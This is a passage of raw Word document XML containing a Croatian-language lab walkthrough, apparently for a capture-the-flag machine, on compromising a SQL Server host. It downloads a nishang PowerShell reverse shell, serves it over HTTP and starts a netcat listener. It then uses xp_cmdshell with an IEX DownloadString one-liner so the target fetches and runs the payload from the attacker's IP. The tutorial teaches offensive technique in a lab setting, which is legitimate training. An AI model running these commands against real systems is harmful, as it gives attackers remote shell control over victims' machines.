        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t>-u (</w:t>
      </w:r>
      <w:r w:rsidR="008172B2" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command Prompt</w:t>
      </w:r>
      <w:r w:rsidR="008172B2">
        <w:t>) ciljanog računala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333815DE" w14:textId="77777777" w:rsidR="008172B2" w:rsidRPr="008172B2" w:rsidRDefault="008172B2" w:rsidP="00E90794"/>
    <w:p w14:paraId="67CB6292" w14:textId="77777777" w:rsidR="008172B2" w:rsidRDefault="008172B2" w:rsidP="008172B2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7CB19B09" wp14:editId="7D784EC7">
            <wp:extent cx="5753735" cy="1164590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7C080" w14:textId="5453A129" w:rsidR="00E90794" w:rsidRPr="008172B2" w:rsidRDefault="008172B2" w:rsidP="008172B2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23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A3DDF">
        <w:t xml:space="preserve"> Konfiguracija SQL servera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB99645" w14:textId="11E97A9D" w:rsidR="00655239" w:rsidRDefault="00E90794" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96245C" w14:textId="6FCC5DD1" w:rsidR="008172B2" w:rsidRDefault="008172B2" w:rsidP="008172B2">
      <w:r>
        <w:t xml:space="preserve">Sada kada imamo pristup </w:t>
      </w:r>
      <w:r w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-u ciljanog računala, možemo izvršiti </w:t>
      </w:r>
      <w:r w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> napad, odnosno napad pomoću kojeg možemo dobili potpunu kontrolu nad </w:t>
      </w:r>
      <w:r w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command Prompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>om ciljanog računala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E380806" w14:textId="3611FAB1" w:rsidR="008172B2" w:rsidRDefault="008172B2" w:rsidP="008172B2">
      <w:r w:rsidRPr="008172B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Otvaramo novi terminal</w:t>
      </w:r>
      <w:r w:rsidR="004C6563">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004C6563">
        <w:t>lociramo se u direktorij unutar kojeg radimo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidR="009859E6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004C6563">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009859E6">
        <w:t xml:space="preserve"> sljedećom naredbom skidamo najnoviju </w:t>
      </w:r>
      <w:r w:rsidR="009859E6" w:rsidRPr="00010B7E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reverse Powershell</w:t>
      </w:r>
      <w:r w:rsidR="009859E6">
        <w:t xml:space="preserve"> skriptu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C109B7" w14:textId="473699C1" w:rsidR="009859E6" w:rsidRDefault="009859E6" w:rsidP="009859E6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="009859E6">
        <w:t>wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42B54F" w14:textId="1CC9283B" w:rsidR="009859E6" w:rsidRDefault="00010B7E" w:rsidP="008172B2">
      <w:r>
        <w:t xml:space="preserve">Te napravimo da se skinuta </w:t>
      </w:r>
      <w:r w:rsidRPr="00010B7E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00010B7E">
        <w:t>skripta može izvršiti s naredbom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3A689" w14:textId="6FF29B54" w:rsidR="00010B7E" w:rsidRDefault="00010B7E" w:rsidP="00010B7E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00010B7E">
        <w:t>sudo chmod +x Invoke-PowerShellTcpOneLine.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC517E5" w14:textId="77777777" w:rsidR="00204A40" w:rsidRDefault="00204A40" w:rsidP="00204A40">
      <w:pPr>
        <w:keepNext/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58BDDD90" wp14:editId="78DA7353">
            <wp:extent cx="5753735" cy="1992630"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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92650" w14:textId="25BD15A7" w:rsidR="00010B7E" w:rsidRPr="00010B7E" w:rsidRDefault="00204A40" w:rsidP="00204A40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24</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A3DDF">
        <w:t xml:space="preserve"> Skidanje Reverese Powershell skripte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE057DA" w14:textId="38A4E473" w:rsidR="00204A40" w:rsidRDefault="00204A40" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Potom otvorite skriptu u alatu za uređivanje koda (mi smo koristili </w:t>
      </w:r>
      <w:r w:rsidRPr="00204A40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Visual Studio Code</w:t>
      </w:r>
      <w:r>
        <w:t>) te od komentirajte dijelove koda te uskladite da se u skripti nalazi pravilna IPv4 adresa, odnosno adresa vašeg VPN-a (</w:t>
      </w:r>
      <w:r w:rsidRPr="00204A40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tur0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Broj </w:t>
      </w:r>
      <w:r w:rsidRPr="00204A40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-a možete stavit proizvoljno no mi smo koristili </w:t>
      </w:r>
      <w:r w:rsidRPr="00204A40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">443. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31878BE4" w14:textId="77777777" w:rsidR="00204A40" w:rsidRDefault="00204A40" w:rsidP="00204A40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02D6724E" wp14:editId="3F62EB86">
            <wp:extent cx="5753735" cy="1061085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715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720F" w14:textId="0A3B877C" w:rsidR="00204A40" w:rsidRDefault="00204A40" w:rsidP="00204A40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25</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002A3DDF">
        <w:t xml:space="preserve"> Uređivanje </w:t>
      </w:r>
      <w:r w:rsidR="002A3DDF">
        <w:t>Reverese Powershell skripte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8453B6" w14:textId="45742422" w:rsidR="007B6900" w:rsidRDefault="00204A40" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E0575" w14:textId="3CCADD2A" w:rsidR="00655239" w:rsidRDefault="007B6900" w:rsidP="007B6900">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54091A0A" w14:textId="48C67F53" w:rsidR="00655239" w:rsidRDefault="00204A40" w:rsidP="00204A40">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc75785395"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="020F6953" w14:textId="24484449" w:rsidR="00204A40" w:rsidRDefault="00204A40" w:rsidP="00204A40"/>
    <w:p w14:paraId="4DBB7602" w14:textId="77777777" w:rsidR="007B6900" w:rsidRDefault="00204A40" w:rsidP="00204A40">
      <w:pPr>
        <w:ind w:firstLine="576"/>
      </w:pPr>
      <w:r>
        <w:t>Sada je sve spremno za napad. Napad ćemo izvršiti tako da ćemo</w:t>
      </w:r>
      <w:r w:rsidR="007B6900">
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:r>
        <w:t>iz SQL Servera</w:t>
      </w:r>
      <w:r w:rsidR="007B6900">
        <w:t xml:space="preserve">, koristeći </w:t>
      </w:r>
      <w:r w:rsidR="007B6900" w:rsidRPr="008172B2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command Prompt</w:t>
      </w:r>
      <w:r w:rsidR="007B6900">
        <w:t xml:space="preserve"> ciljanog računala, spojiti na naše lokalno računalo preko </w:t>
      </w:r>
      <w:r w:rsidR="007B6900" w:rsidRPr="007B6900">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="007B6900">
        <w:t xml:space="preserve">-a 443, prenijeti s lokalnog računala </w:t>
      </w:r>
      <w:r w:rsidR="007B6900" w:rsidRPr="007B6900">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reverse Powershell</w:t>
      </w:r>
      <w:r w:rsidR="007B6900">
        <w:t xml:space="preserve"> skriptu na ciljano računalo gdje će se ona izvršiti i dati nam potpuni pristup podacima ciljanog računala.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860414C" w14:textId="77777777" w:rsidR="007B6900" w:rsidRDefault="007B6900" w:rsidP="007B6900">
      <w:r>
        <w:t>Ovaj korak je najsloženiji je se treba koristiti više terminala istovremeno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037061AB" w14:textId="5FF33F77" w:rsidR="00204A40" w:rsidRDefault="007B6900" w:rsidP="007B6900">
      <w:r>
        <w:t xml:space="preserve">Napad započinjemo </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>otvaranjem novog terminala</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (kojeg otvaramo unutar direktorija gdje smo spremili Powershell skriptu!!)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gdje pokrećemo vlastiti server na </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t>-u 80 pomoću naredbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE1733" w14:textId="6FD43DAD" w:rsidR="005E2A9B" w:rsidRDefault="007B6900" w:rsidP="005E2A9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:t>sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53766EA1" w14:textId="559B6066" w:rsidR="007B6900" w:rsidRDefault="005E2A9B" w:rsidP="007B6900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741CF335" wp14:editId="324A84C5">
            <wp:extent cx="6176520" cy="1173193"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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65" b="37016"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6240711" cy="118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A4B69" w14:textId="19D1F9E9" w:rsidR="007B6900" w:rsidRPr="007B6900" w:rsidRDefault="007B6900" w:rsidP="005E2A9B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26</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E602CA">
        <w:t xml:space="preserve"> Hostanje http servera na lokalnom računalu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D4E4B" w14:textId="16C60F71" w:rsidR="00655239" w:rsidRDefault="007B6900" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Sljedeće, </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">otvaramo </w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>još jedan</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> izvršavamo naredb</w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B">
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4F11B" w14:textId="35BF5A36" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9072"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:t>sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2202E" w14:textId="04941B93" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:t>sudo ufw status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B462AA" w14:textId="18170676" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B">
      <w:r>
        <w:t xml:space="preserve">S kojima postavljamo </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pravila s kojima dozvoljavamo da računalo sa 10.10.10.27 IPv4 adresom šalje podatke na naše lokalno računalo preko </w:t>
      </w:r>
      <w:r w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t>-ova 80 i 443.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A876368" w14:textId="77777777" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B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484AB87D" wp14:editId="6FD96F6C">
            <wp:extent cx="5270566" cy="1880558"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="33" name="Slika 33" descr="Slika na kojoj se prikazuje tekst, telefon, mobitel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lika 33" descr="Slika na kojoj se prikazuje tekst, telefon, mobitel, snimka zaslona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60" cy="188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9AC5" w14:textId="678B23E1" w:rsidR="005E2A9B" w:rsidRPr="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B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27</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E602CA">
        <w:t xml:space="preserve"> Uređivanje firewall pravila</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B658A4" w14:textId="60DE78DD" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="00C66C3B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Potom izvršavamo naredbu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF9225" w14:textId="1881810D" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:t>sudo nc -lvnp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D09FCA" w14:textId="77128EA8" w:rsidR="00655239" w:rsidRDefault="007B6900" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">kojom aktiviramo </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6900">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Natcat listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">koji „sluša“ sve što se </w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B">
        <w:t xml:space="preserve">događa na </w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B" w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B">
        <w:t xml:space="preserve">-u 443. Natcat će prikazati rezultat izvršavanja </w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B" w:rsidRPr="005E2A9B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reverse Powershell</w:t>
      </w:r>
      <w:r w:rsidR="005E2A9B">
        <w:t xml:space="preserve"> skripte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7AF61" w14:textId="64931653" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="00C66C3B">
      <w:r>
        <w:t>Nakon svega se vraćamo u terminal gdje nam je SQL Server i tamo upisujemo naredbu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD90624" w14:textId="55679790" w:rsidR="005E2A9B" w:rsidRDefault="005E2A9B" w:rsidP="005E2A9B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:framePr w:hSpace="0" w:vSpace="0" w:wrap="auto" w:vAnchor="margin" w:yAlign="inline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00793500" w:rsidRPr="00793500">
        <w:t>xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.1</w:t>
      </w:r>
      <w:r w:rsidR="00793500">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00793500" w:rsidRPr="00793500">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00793500">
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidR="00793500" w:rsidRPr="00793500">
        <w:t>/Invoke-PowerShellTcpOneLine.ps1\");""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC60A4" w14:textId="2E7BFF15" w:rsidR="005E2A9B" w:rsidRDefault="00793500" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Pobrinite se da ste upisali ispravnu IPv4 adresu (odnosno adresu vašeg VPN-a </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tun0</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F58864" w14:textId="08C0ED47" w:rsidR="00793500" w:rsidRDefault="00793500" w:rsidP="00C66C3B">
      <w:r>
        <w:t>Vaš ekran bi trebao ovako izgledati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B743D" w14:textId="77777777" w:rsidR="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="5DEC94E1" w14:textId="77777777" w:rsidR="00793500" w:rsidRDefault="00793500" w:rsidP="00793500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7B92E861" wp14:editId="53867A0D">
            <wp:extent cx="6021190" cy="2553314"/>
            <wp:effectExtent l="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948" cy="256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57F12" w14:textId="16A192EC" w:rsidR="00793500" w:rsidRDefault="00793500" w:rsidP="00793500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28</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E602CA">
        <w:t xml:space="preserve"> Izvedba napada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C919054" w14:textId="77777777" w:rsidR="00D506D1" w:rsidRPr="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00D506D1"/>
    <w:p w14:paraId="0F2C2153" w14:textId="28D3BB21" w:rsidR="00D506D1" w:rsidRDefault="00793500" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">U terminalu gdje je pokrenut </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Natcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> biste trebali vidjeti tekst „</w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>connect to [10.10.15.63] from …</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“. Ako vidite tu poruku, znači da ste sve uspješno napravili. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8151E7" w14:textId="3B2FDC11" w:rsidR="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00C66C3B"/>
    <w:p w14:paraId="51D9BA7A" w14:textId="7331C503" w:rsidR="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="00D506D1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417D713" w14:textId="61A2C652" w:rsidR="00793500" w:rsidRDefault="00793500" w:rsidP="00793500">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VAŽNO!!!</w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U terminalu gdje je pokrenut </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Natcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">listener </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">prekinite“ rad alata upisom </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>u terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49553EC1" w14:textId="29808FC2" w:rsidR="00793500" w:rsidRDefault="00793500" w:rsidP="00793500">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B39B7B2" wp14:editId="3B74E798">
            <wp:extent cx="2723554" cy="1578634"/>
            <wp:effectExtent l="0" t="0" r="635" b="254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0" r="18209" b="45695"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2743930" cy="159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2CD44" w14:textId="0632AE4A" w:rsidR="00793500" w:rsidRPr="00793500" w:rsidRDefault="00793500" w:rsidP="00793500">
      <w:pPr>
        <w:pStyle w:val="Opisslike"/>
        <w:rPr>
          <w:b/>
          <w:bCs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21519D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E602CA">
        <w:t xml:space="preserve"> CMD ciljnog računala</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405CBDDE" w14:textId="0E4AE2AE" w:rsidR="00655239" w:rsidRDefault="00793500" w:rsidP="00C66C3B">
      <w:r>
        <w:t xml:space="preserve">Čestitamo, upravo ste hakirali računalo. Dovršite napad upisom naredbe </w:t>
      </w:r>
      <w:r w:rsidRPr="00793500">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cd sql_svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021519D" w:rsidRPr="0021519D">
        <w:t>te</w:t>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021519D" w:rsidRPr="0021519D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidR="0021519D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021519D">
